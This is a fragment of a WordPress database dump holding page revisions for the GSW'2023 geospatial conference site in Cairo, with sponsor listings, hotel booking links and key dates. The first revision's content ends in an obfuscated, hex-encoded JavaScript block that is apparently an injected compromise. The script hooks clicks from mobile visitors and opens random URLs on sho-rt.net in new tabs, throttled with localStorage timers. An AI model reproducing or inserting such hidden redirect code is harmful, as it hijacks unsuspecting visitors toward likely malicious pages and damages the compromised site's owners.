link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 22:34:05','2023-06-09 22:34:05','',3066,'https://gsw2023.com/?p=4675',0,'revision','',0),
(4676,1,'2023-06-09 22:34:30','2023-06-09 22:34:30','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350012764{margin-top: 185px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" 